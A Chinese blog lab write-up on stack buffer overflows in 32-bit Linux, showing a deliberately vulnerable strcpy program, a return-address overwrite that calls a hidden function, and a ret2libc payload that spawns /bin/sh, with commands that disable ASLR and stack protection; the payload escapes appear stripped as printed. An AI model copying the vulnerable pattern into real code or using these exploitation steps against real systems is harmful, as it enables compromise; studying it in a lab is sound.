32数组溢出怎么解决_缓冲区溢出实验

最新推荐文章于 2022-12-30 10:16:35 发布
最新推荐文章于 2022-12-30 10:16:35 发布
阅读量353 收藏
点赞数
文章标签: 32数组溢出怎么解决
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39722196/article/details/112629579
版权

缓冲区溢出实验

实验环境

系统环境:
     Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-176-generic x86_64)
 其他环境:
     gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12)
     GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1

栈缓冲区溢出

  • 原理

漏洞代码:

#include <stdio.h>
#include <string.h>
char buffer[] = "01234567890123456789========ABCD";
void foo1(){printf("You are attacked!n");}
void foo()
{
   char buff[16];
   strcpy (buff, buffer);
}
int main(int argc, char * argv[])
{
   foo();
   return 0;
}

可以很明显的看出漏洞在strcpy函数处:buffer数组的大小已经超过16个字节。

62354069ca536f84108f11167c546ce0.png

上图时程序运行时内存结构图,其中代码区存放c程序代码,静态数据区存放全局变量buffer数组,动态数据区存放临时变量,寄存器ebp指向栈底,寄存器esp指向栈顶,寄存器eip指向下一条需要执行的代码。

当程序运行到foo函数中的strcpy(buff, buffer)之前时,此时程序运行时内存结构如下图。

4d0fd713143da1dff296fb825b3cf449.png

执行strcpy(buff, buffer)后,buffer数组中的数据会填充到buff中,但很明显buff开辟的16字节空间不够,那么剩余内容将会继续向上填充,如下图所示。

234f1ec623e2735a7a7781b3050b7a8d.png

此时,当foo函数运行完,返回main函数时,发现之前保存的foo函数返回地址被修改了,此时栈顶寄存器esp的高16位为ABCD,esp将把ABCD传给eip,但ABCD为非法地址,程序报错。

24fa40fef96908abda4acd4d62ccafdb.png
  • 运行结果

在打开数据执行保护机制下运行。

8815f33a51fc652cc5d8f11bd031459e.png

在关闭数据执行保护机制下运行,首先需要关闭ASLR。

echo 0 > /proc/sys/kernel/randomize_va_space

然后运行代码并打开gdb调试。

gcc -Wall -g -o h h.c -fno-stack-protector -m32 //-m32寄存器为32位
gdb h

在foo函数的ret处设置断点,查看此时esp值,值为0x44434241,转换为十进制为DCBA。

baa4b224c1d7575650b782e4254fdfb7.png

esp将值传给eip,eip跳转到下一条指令位置,但ABCD是非法地址,所以程序报错。

734eef5f538e21b4130f59d82eecbf39.png
  • 攻击结果

但是如果ABCD处的值是合法地址呢,此时将漏洞代码改成攻击代码。

#include <stdio.h>
#include <string.h>
char buffer[] = "01234567890123456789========x3bx84x04x08";
void foo1(){printf("You are attacked!n");}
void foo()
{
   char buff[16];
   strcpy (buff, buffer);
}
int main(int argc, char * argv[])
{
   foo();
   return 0;
}

首先通过gdb查看foo1函数首地址。

e9f37f04419c822e65bdd7eee72ec144.png

然后将刚才漏洞代码中ABCD位置改为foo1函数首地址。

94b6d8f2bb2d8b04f29bba0e4dc20d46.png

运行结果如下图,我们可以发现输出You are attacked!即程序运行了foo1函数。

04dab2810df88be6e0fde7bec19ed5cc.png

ret2libc——return to libc

libc中有大量的库函数,ret2libc通过找到libc中函数执行,而绕过了数据不可执行的问题。

攻击原理同上面栈缓冲区溢出相似,构造buffer数组,通过把函数返回地址直接指向系统库中的函数,这里以system("/bin/sh")为例,通过攻击代码打开一个bash。

攻击代码如下:

#include <stdio.h>
#include <string.h>

char buffer[] = "01234567890123456789========xa0xcdxe4xf7xd0x09xe4xf7xa0xd8xffxff";
void foo()
{
   char buff[16];
   strcpy (buff, buffer);
}
int main(int argc, char * argv[])
{
   foo();
   return 0;
}

在打开数据执行保护机制下运行。

252fb3d6de201c2b9b52d08465b00032.png

在关闭数据执行保护机制下运行,首先需要关闭ASLR。

echo 0 > /proc/sys/kernel/randomize_va_space

然后运行代码并打开gdb调试。

gcc -Wall -g -o ret2lic ret2lic.c -fno-stack-protector -m32
gdb ret2lic

根据上一个实验,我们已经知道返回值是ABCD处,所以只要将system地址和/bin/sh地址覆盖ABCD就可以了。

d3a9c1899af9dfff050bd1200233a7ec.png
  1. 先确定system和exit的地址。

d4786bea9bbf2745f1e907a2f2534da3.png

2. 再查找/bin/sh地址,键入命令x/500s $esp,直至找到"SHELL=/bin/bash"地址并提取/bin/bash字符串地址。

8cfa4c579c6501b15bbcaed136af8752.png

9e29de00d580c15e748e7f30c2b54968.png

3. 组合buffer数组。

填充字符 + system_addr + exit_addr + binsh_addr
char buffer[] = "01234567890123456789========xa0xcdxe4xf7xd0x09xe4xf7xa0xd8xffxff";

运行结果如下图。

cd576b6ae7dca6ed38b71ba27949c5d4.png

成功打开一个bash。

weixin_39722196
关注
缓冲区溢出及原理
一杯水果茶!足矣~
12-05 1108
缓冲区溢出就好比一个杯子倒太多的水,溢出来,这叫溢出
从零开始学Win32平台缓冲区溢出(Part1)
热门推荐
龙哥盟
03-18 3万+
原文:Stack Based Buffer Overflow in Win 32 Platform: The Basics 译者:鸢尾 来源:从零开始学Win32平台缓冲区溢出(Part1) 缓冲区溢出是一个常见的且大家经常耳闻的软件安全漏洞,缓冲区溢出即是数据被过多的写入内存或者缓冲区,当一个缓冲区内的数据写满后,如果继续写入数据数据就会溢出到其他缓冲区中,这将会覆盖或者说是
【初识C语言】 数组缓冲区溢出
理智的博客
12-30 1285
帮助初学者快速了解关于C语言数组缓冲区溢出的相关内容
缓存区溢出检测
刘松华-林散
05-15 3181
转自:http://blog.csdn.net/galihoo/article/details/2299151 目前,缓冲区溢出应该是攻击的最直接的方式,因此如何检测缓冲区溢出以及保护刻不容缓 ,然而当前并没有很稳定可靠的方法来对缓冲区溢出进行检 测,MACFEE应该是提出缓冲区溢出保护的最早的安全厂商,然而如今也不再对该技术进行大肆宣传了,这几天在网上翻了一下,感觉Comodo公司对缓冲 区溢
数组越界与缓冲区溢出
weixin_30361753的博客
12-23 368
数组下标越界(Index out of bounds)对初学者来说是很易犯的错误。先来看数组下标越界的例子。 1 #include <stdio.h> 2 int main(void) 3 { 4 int i, a, s[5], b; 5 6 printf("%p %p %p\n", &a, s, &b); 7 ...
缓冲区溢出(浅层分析)
05-09 389
一、什么是缓冲区 缓冲区是一块连续的计算机内存区域,可保存相同数据类型的多个实例。缓冲区可以是栈、堆和静态数据区。在C/C++中,通常使用字符数组和malloc/new之类内存分配函数实现缓冲区。溢出数据被添加到分配给该缓冲区的内存块之外。溢出溢出时最常见的程序缺陷。 当向局部数组缓冲区里写入的数据超过为其分配的大小时,就会发生缓冲区溢出。 二、实例代码 #include <stdio.h> void foo() { int a, * p; //强制改变p地址位置,而这个.
利用c语言来的数组溢出实现缓冲区炸弹,内存地址指针
最新发布
08-02
利用c语言来的数组溢出实现缓冲区炸弹,内存地址指针
缓冲区溢出实验
10-29
**缓冲区溢出实验** 缓冲区溢出是计算机科学中一个重要的安全问题,尤其是在软件开发领域。这个实验将深入探讨这一主题,理解其原理,并学习如何预防和应对这种漏洞。 ### 1. 缓冲区溢出的概念 缓冲区溢出...
东南大学网络空间安全实验基础——缓冲区溢出漏洞实验
07-07
东南大学网络空间安全实验基础——缓冲区溢出漏洞实验实验报告的主要目的是了解缓冲区溢出漏洞的原理和实验过程。缓冲区溢出漏洞是一种常见的安全漏洞,攻击者可以通过溢出缓冲区来 inject恶意代码,从而控制...
linux缓冲区溢出漏洞简介
黑白之道
02-20 544
实验过程:1:安装32位编译工具 lib32z1 libc6-dev-i386,关闭地址空间随机化2:安装编译器zsh并替换sh指向的/bin/bash(因为sh具有保护欺骗性uid程序在整个运行中不保持root权限)3:shellcode(汇编码字节填充,一共64字节)4:su权限编译stack.cFopen(“badfile”,r)badfile必须存在,也就是我们先运行exploit.c生成
2021-06-03
weixin_44592738的博客
06-03 342
警告 C6386 缓冲区可能溢出的问题@TOC 问题详述 在编写动态数组时,因为需要从堆区动态创建数组,所以引发了缓冲区可能溢出的问题。 代码如下 class WorkerManager { public: int size; Worker** workerArray; }; void WorkerManager::add_Emp() { int addNum; cout << "请输入要添加职工的人数:" << endl; cin >> addNum; i
关于32位计数器溢出问题
科学边界
03-29 6248
好久没写博客了,昨天遇到一个时间计数溢出问题, 做个简单记录吧 背景:底层提供一个unsigned int的变量表示自开机以来累计时间,用作码流的时间戳,单位ms. 问题:32位无符号数的毫秒计数,大概49天就会溢出溢出后时间计数用作时间戳就会出错,导致无法正确解码。 为解决这一问题,用一个64位变量来保存累计时间, 方法如下:
strcpy的字符串溢出真的很可怕
liuxunfei15的博客
04-20 1883
如图: 按代码逻辑,程序员的想法是校验传入的str字符串密码,是不是"123",如果是的话就打印“Checkpasswordsucceed!”, 反之则打印“Checkpasswordfailed!”。所以当一个人不知道字符串密码的时候,它任意传入一串字符串,就如图中的 ,好家伙,一眼看过去,按代码逻辑来,你是不是觉得校验失败了,然后打印“Checkpasswordfailed!”? 然而,最终的结果却是:校验成功了“Checkpasswordsucceed!” 等你再回头...
溢出问题
u012713968的专栏
01-08 1960
在C/C++程序里有一类非常典型的问题,那就是:溢出问题。一般在笔试题里,这类问题会以程序改错或者安全问题出现。现在分别来分析一下常见的数组溢出,整数溢出缓冲区溢出,栈溢出和指针溢出等。 (1)数组溢出 在C语言中,数组的元素下标是从0开始计算的,所以,对于n个元素的数组a[n], 遍历它的时候是a[0],a[1],...,a[n-1],如果遍历到a[n],数组溢出了。  void
BUF在c语言中的作用,C语言如何执行buf中的代码
weixin_42523104的博客
05-16 4081
缓冲区溢出攻击已经存在了很长时间了。它仍然存在于今天,部分原因是程序员在编写代码时不小心。我所说的“部分”原因是因为有时编写好的代码可以利用缓冲区溢出攻击,因为这也取决于攻击者的奉献精神和智能级别。方法/步骤我们至少可以做的是避免编写不好的代码,从而有机会甚至脚本小孩攻击你的程序并利用它在这个缓冲区溢出教程中,我们将讨论以下的基础知识:什么是缓冲区溢出?如何发生缓冲区溢出?如何发生缓冲区溢出攻击?...
C语言缓冲区溢出漏洞深度分析与防御策略
缓冲区溢出是由于程序员在处理字符串或数组时,未正确检查输入数据长度,导致数据超出预分配的缓冲区边界,从而覆盖相邻内存区域的现象。这种漏洞常常被黑客利用,发起攻击,对系统安全构成威胁。 本文深入分析了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值